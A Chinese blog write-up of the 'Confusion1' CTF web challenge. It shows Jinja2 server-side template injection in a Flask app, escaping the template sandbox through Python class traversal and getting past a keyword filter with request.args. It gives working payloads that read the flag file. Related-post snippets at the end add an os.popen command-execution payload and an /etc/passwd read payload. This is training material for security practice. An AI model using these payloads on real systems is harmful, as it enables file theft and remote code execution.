SSTI 攻防世界 Confusion1

于 2024-07-24 11:52:50 发布
阅读量815 收藏 30
点赞数 17
分类专栏: CTF web题目 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/140658060
版权

进来这张图片分析良久,大象,蛇,Python VS PHP?因为php图标就是大象

点击login,和register功能却无法显示页面给我人干懵了,还以为题目环境的问题

然后dirsearch和githack也没扫出东西来,看它的数据包却发现注释里写了flag存放地址

怎么读取flag呢?文件包含但是找不到源码,SSRF连参数都没有!

突破点估计还是在登录和注册这里

利用edge扩展查看了一下网站架构,看到是flask框架,这玩意就有可能是模版注入了!

输入表达式{{7*'7'}}看看

下面是判断模版注入的方法

输入{{7*‘7’}},返回49表示是 Twig 模块

输入{{7*‘7’}},返回7777777表示是 Jinja2 模块

回显7个7说明是jinja模版引擎

通过python的对象的继承来一步步实现文件读取和命令执行

思路:找到父类<type 'object'>-->寻找子类-->找关于命令执行或者文件操作的模块。

寻找可用的引用类payload:

"".__class__.__mro__[2].__subclasses__()

解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。

具体来说,__class__是一个内置属性,表示一个对象所属的类。通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。

在MRO中,索引为2的元素表示对象所属类的直接父类。对于大多数类,索引为2处的元素是object类,因为大多数类都直接或间接继承自object类。

然后通过调用__subclasses__()方法,可以获取一个列表,其中包含了该类的所有子类。这些子类是可用的类,可以用于创建对象和调用其方法。

综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)。

flask jinja渲染引擎中格式:

控制结构 {% %}

变量取值 {{}}

注释 {# #}

构造payload:{{"".__class__.__mro__[2].__subclasses__()}}  查看可利用的类

提示让我们换一种方式,过滤了__class__这些基础类?

确定过滤基础类,得通过其他办法来进行调用

request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "
request.args.key   ,args是参数,key可以是内置函数

request.args被作为对象,通过.获取其名为key的属性值。不需要在外面加点

即""[request.args.__class__]和"".__class__效果是一样的,但是因为在语句中过滤了基础类,我们可以采取变量赋值的方式绕过限制

构造payload:

{{""[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

成功看到当前的可利用类并且找到file类的位置在第40(从0开始算)

可以利用我这个python小脚本来找,只复制[ ]列表里面的内容

# 输入一个字符串
input_str = input("请输入要分隔的元素,使用逗号分隔:")

# 将输入的字符串按逗号分隔成列表
elements = input_str.split(",")

# 打印每个元素及其位置
for index, element in enumerate(elements):
    if "file" in element:
        print(f"位置 {index}: {element.strip()}")
        exit("found!")

找到file类的位置为40

原本靠

"".__class__.__mro__[-1].__subclasses__()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read()即可利用file读取文件,40就是file类在object中的位置,因为过滤我们构造payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

成功回显flag!看不懂的搜几篇文章看下,这篇也行;ssti详解与例题以及绕过payload大全_ssti绕过空格-CSDN博客

孤丞OVO
关注
  • 17
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
攻防世界Confusion1
最新发布
wangzhemvp的博客
04-09 532
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界Confusion1
qq_43774856的博客
12-09 780
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界----confusion1
qq_44418229的博客
07-22 1209
攻防世界----confusion1 如何确定是SSTI漏洞; 确定后要怎么绕过
攻防世界 Confusion1
CyhDl666的博客
02-26 281
进入页面 index.php页面查看了源码,没有什么发现 进入Login.php页面 返回404??? 查看一下源码 从这里看可能是个SSTI模板注入 这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入 按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是 从这里来看应该是存在一个过滤 想到做过的SSTI题目 shrine用的是url_for函数 尝试一下 ...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
1. `README.md`:项目简介和使用指南。 2. `requirements.txt`:列出项目所需的Python依赖库。 3. `app.py`:Flask应用的主文件,包含应用实例和路由定义。 4. `templates/`:存放Jinja2模板文件的地方,可能存在易...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入(SSTI)1
07-25
Apache OfBiz 服务器端模板注入(SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ...
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
10-23
【全国大学生信息安全竞赛决赛Web4】是一个针对网络安全与攻防技术的挑战,主要涉及Web应用程序安全领域。在本次竞赛中,参赛者需要解决一个结合了Server-Side Template Injection(SSTI)和TensorFlow模型的问题。...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
1. **Detect**(检测):识别可能存在的模板注入漏洞,通过分析应用程序的输入和输出模式来发现不安全的用户输入处理。 2. **Identify**(识别):确定模板引擎类型和版本,这对于了解可能的exploit和潜在的漏洞至关...
Web入门指北1
08-03
Web入门指南旨在帮助初学者了解并踏入Web安全领域。Web方向是网络安全竞赛(CTF)中的一个重要部分,因其不需要深入的系统底层知识或高级数学能力而成为...只要保持热情和毅力,就能逐渐在Web安全的世界里游刃有余。
毕业论文1
08-08
此外,新型漏洞如SSTI模板注入和Python Flask模块的安全问题也不容忽视。 Web安全不仅关乎技术,还涉及到社会工程学攻击。如用户数据泄露后,可能导致密码和社会工程学攻击的风险增加。简单的密码、重复使用同一...
tplmap.zip
07-26
这个工具主要用于安全领域,特别是针对一种名为“Server-Side Template Injection”(SSTI)的安全漏洞进行测试和利用。SSTI是Web应用程序中的一种常见漏洞,它允许攻击者通过注入恶意模板代码来执行服务器端的任意...
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
Garud:自动化工具可以扫描子域,子域接管,然后过滤掉XSS,SSTI,SSRF和更多注入点参数,并自动扫描一些低悬空漏洞
03-21
一种自动化工具,可以扫描子域,子域接管,然后过滤出xss,ssti,ssrf和更多注入点参数。 要求: Go语言,Python 2.7或Python 3。 系统要求:建议在具有1VCPU和2GB内存的vps上运行。 使用的工具-您必须安装这些工具...
bugkuctfweb题解simple_ssti_1
06-28
### 回答1: simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符串嵌入到一个 Flask 模板中,并将渲染后的页面返回给用户。攻击者可以在输入框中输入包含 SSTI 代码的字符串,从而在服务器上执行任意代码。 为了解决这个问题,可以使用 Flask 的 Jinja2 模板引擎提供的 safe 过滤器来过滤用户输入,防止用户输入的字符串被作为代码执行。或者在编写模板时,尽量避免使用可执行的表达式,而是将变量放在 HTML 标签中输出。 这个题目是一个很好的 SSTI 注入练习题目,可以帮助我们了解 SSTI 注入的危害和防御方法。 ### 回答2: Simple_ssti_1是BugsKiller CTF比赛中的一道Web题目,考察的知识点是SSTI(Server-Side Template Injection)模板注入,需要寻找漏洞点并利用SSTI漏洞构造payload,达到读取/执行任意代码的目的。 首先,我们下载题目附件simple_ssti_1.zip,获得题目源代码及相关文件。查看代码,发现以下几点: 1. 程序的入口是index.php文件,包含了一个GET参数tpl,可控注入的点在这里。 2. 向模板文件simple_ssti_1_template.html中传入tpl参数,在该文件中执行了{{tpl}}操作,将tpl参数进行了模板渲染。 3. SSTI的注入点在于,如果我们的攻击payload中包含了一些特殊模板语法的操作符,如{{3*3}}、{{config}}等,这些操作符会被解析器自动执行,导致代码注入进去。 从上述代码的分析可知,我们首先需要构造包含有SSTI操作符的payload才能进行下一步的SSTI构造。继续观察代码,我们发现一个{{config}}变量被渲染在了simple_ssti_1_template.html的头部中,我们可以通过注入payload来构造一个同名的config变量,从而读取根目录的敏感文件/flag.php。 构造payload : {{config.__class__.__init__.__globals__['os'].popen('cat flag.php').read()}} 这个SSTI注入的payload实现了直接运行命令cat flag.php然后读取文件的操作。注入的{{config}}变量实际上是一个自定义的config字典,含有很多内置函数,比如__class__.__init__.__globals__,它的作用是获取全局变量__builtins__,然后通过这个全局字典来获取os模块,之后就可以使用os模块的popen函数运行cat命令来获取flag.php文件内容了。 最终的payload为: ?tpl={{config.__class__.__init__.__globals__['os'].popen('cat /flag.php').read()}} 再通过浏览器发送带有payload的GET请求,就可以读取/root/flag.php中的flag了。 ### 回答3: 简单SSTI 1是一道基于SSTI漏洞的Web安全挑战题目,该题的难度属于初级。本题需要掌握一定的SSTI漏洞的相关知识和技巧,以及对模板中的变量注入点的识别和利用能力。 首先,我们尝试在输入框中输入简单的Python表达式,例如{{2+2}},并提交请求,发现得到的响应结果为4,表明该网站存在SSTI漏洞。接着,我们可以构造一些特殊的表达式进行测试,例如{{123456789}}, {{2**100}}, {{'hello ' + 'world'}}, 发现均能得到正确的响应结果。 接着我们需要进行变量注入点的识别和利用,这里,我们可以通过利用flask框架中的特殊变量,例如request、g等来实现变量注入,例如{{config}},可以获得flask的配置信息,{{request}}可以获得当前请求的一些信息。需要注意的是,在实战中,这些利用方式可能会受到服务器的限制,无法完全实现。 最后,我们需要尝试获取敏感信息或者升级我们的权限,例如{{''.__class__.mro()[1].__subclasses__()[71]('/etc/passwd').read()}},可以获取到服务器上/etc/passwd文件的内容。 总之,简单的SSTI漏洞需要熟练掌握SSTI漏洞的相关知识和技巧,识别变量注入点并利用它们获取敏感信息和升级权限,可以通过CTF题目学习,提高自己的Web安全攻防能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值